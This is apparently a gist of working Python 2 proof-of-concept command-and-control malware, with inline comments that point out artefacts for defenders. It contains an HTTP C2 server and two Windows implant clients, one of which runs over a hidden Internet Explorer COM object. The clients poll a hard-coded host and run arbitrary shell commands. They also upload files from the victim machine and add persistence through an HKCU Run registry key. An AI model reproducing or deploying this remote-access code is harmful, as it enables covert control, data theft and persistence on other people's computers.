Created
May 7, 2018 03:42
POC HTTP C&C
# HTTP SERVER
#--------------------------------------------
# Python 2 standard library (BaseHTTPServer became http.server in Python 3).
import BaseHTTPServer
import os, cgi
# Listener address of the C2 web server. Both client scripts further down
# hard-code the same IP and plain HTTP on port 80, so every beacon, command
# and result crosses the network unencrypted and is visible to inspection.
HOST_NAME = '172.16.20.201'
PORT_NUMBER = 80
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """C2 request handler.

    GET  -> hands the next operator-typed command to the requesting client.
    POST -> '/info' stores an uploaded file; any other path prints the body
            (command output) to the operator console.
    No authentication or client check exists on either method.
    """
    def do_GET(s):
        # Blocks the server on operator input for every GET and returns the
        # typed command verbatim as the response body to whoever asked.
        command = raw_input("Shell> ")
        s.send_response(200)
        s.send_header("Content-type", "text/html")
        s.end_headers()
        s.wfile.write(command)
    def do_POST(s):
        if s.path == '/info':
            # File-upload endpoint: the multipart field 'file' is written,
            # unvalidated, to a fixed path (overwritten on every upload).
            # The /root/ path suggests the listener is run as root.
            try:
                ctype, pdict = cgi.parse_header(s.headers.getheader('content-type'))
                if ctype == 'multipart/form-data' :
                    fs = cgi.FieldStorage( fp = s.rfile,headers = s.headers,environ={ 'REQUEST_METHOD':'POST' })
                else:
                    print "[-] Unexpected POST request"
                fs_up = fs['file']
                with open('/root/Desktop/1', 'wb') as o:
                    o.write( fs_up.file.read() )
                s.send_response(200)
                s.end_headers()
            except Exception as e:
                # Any exception in the upload path is printed and swallowed.
                print e
            return
        # Every other path: acknowledge, then read Content-Length bytes of
        # client-posted command output and echo them to the console.
        s.send_response(200)
        s.end_headers()
        length = int(s.headers['Content-Length'])
        postVar = s.rfile.read(length )
        print postVar
if __name__ == '__main__':
    # Bind the listener on the hard-coded address and serve until Ctrl-C.
    server_class = BaseHTTPServer.HTTPServer
    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print '[!] Server is terminated'
    httpd.server_close()
#HTTP CLIENT
#--------------------------------------------
import requests
import subprocess
import os
import time
import shutil
# Windows-only dependency: _winreg (Python 2 name of winreg) is used below
# to write an HKCU Run-key value for persistence.
import _winreg as wreg
import random
def httpConnect():
    """Beacon loop: poll the C2 server over plain HTTP and act on each reply.

    Returns 1 when the server replies with 'terminate'; otherwise never
    returns. Network footprint for defenders: a GET to http://172.16.20.201
    every 3 seconds, POSTs of command output to the same host, and multipart
    uploads to /info. Exceptions propagate to the caller.
    """
    # NOTE(review): indentation reconstructed from the gist rendering.
    while True:
        req = requests.get('http://172.16.20.201')
        command = req.text
        if 'terminate' in command:
            return 1
        elif 'grab' in command:
            # Exfiltration: 'grab*<path>' uploads that local file as field 'file'.
            grab,path=command.split('*')
            if os.path.exists(path):
                url = 'http://172.16.20.201/info'
                files = {'file': open(path, 'rb')}
                r = requests.post(url, files=files)
            else:
                post_response = requests.post(url='http://172.16.20.201', data='[-] Not able to find the file !')
        elif 'persistence' in command:
            # Persistence: copies putty.exe from the current directory into
            # %USERPROFILE%\Documents and registers that path under
            # HKCU\Software\Microsoft\Windows\CurrentVersion\Run as 'RegUpdater'.
            # The value name and the Documents\putty.exe path are the
            # host-based artefacts to look for.
            path = os.getcwd().strip('/n')
            Null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split('=')
            destination = userprof.strip('\n\r') + '\\Documents\\' +'putty.exe'
            if not os.path.exists(destination):
                shutil.copyfile(path+'\putty.exe', destination)
                key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run",0,wreg.KEY_ALL_ACCESS)
                wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ,destination)
                key.Close()
            post_response = requests.post(url='http://172.16.20.201', data="[*] Persistence completed!")
        elif 'cd' in command:
            # 'cd <dir>': change working directory and report the new cwd.
            code,directory = command.split(' ')
            os.chdir(directory)
            cwd="[+] CWD is " + os.getcwd()
            post_response = requests.post(url='http://172.16.20.201', data=cwd)
        else:
            # Anything else is passed verbatim to the shell (shell=True);
            # stdout and stderr are posted back as two separate requests.
            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            post_response = requests.post(url='http://172.16.20.201', data=CMD.stdout.read())
            post_response = requests.post(url='http://172.16.20.201', data=CMD.stderr.read())
        # Fixed 3-second beacon interval with no jitter.
        time.sleep(3)
#def main():
# Reconnect loop around the beacon. A bare except catches every error from
# httpConnect(); the delay is drawn and printed but no sleep is performed,
# so failed connections are retried immediately (a burst of retries on the wire).
while True:
    try:
        if httpConnect() == 1:
            break
    except:
        sleep_for = random.randrange(1, 10)
        print "[*] Error to connect C&C server trying to connect in :" + str(sleep_for) + "seconds..."
        pass
#if __name__ == "__main__":
#    main()
#IE COM CLIENT
#--------------------------------------------
# pywin32 COM automation (third-party); Windows only.
from win32com.client import Dispatch
from time import sleep
import subprocess
# Variant of the client that drives a hidden Internet Explorer instance over
# COM as its HTTP transport. Because IE performs the Navigate calls, the
# connections to the C2 host are made by the browser process rather than by
# the Python interpreter -- worth knowing when correlating process and
# network telemetry.
ie = Dispatch("InternetExplorer.Application")
ie.Visible = 0
dURL = "http://172.16.20.201"
flags = 0
targetFrame = ""
while True:
    ie.Navigate("http://172.16.20.201")
    # Poll until the document is fully loaded (ReadyState 4 = complete).
    while ie.ReadyState != 4:
        sleep(1)
    # The command is whatever the server put in the page body.
    command = ie.Document.body.innerHTML
    command = unicode(command)
    command = command.encode('ascii','ignore')
    print ' [+] Get command: ' + command
    if 'terminate' in command:
        ie.Quit()
        break
    else:
        # Command is run through the shell; only stdout is sent back,
        # as the POST body of a second Navigate call.
        cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        data = cmd.stdout.read()
        postData = buffer(data)
        ie.Navigate( dURL, flags, targetFrame, postData )
    sleep(3)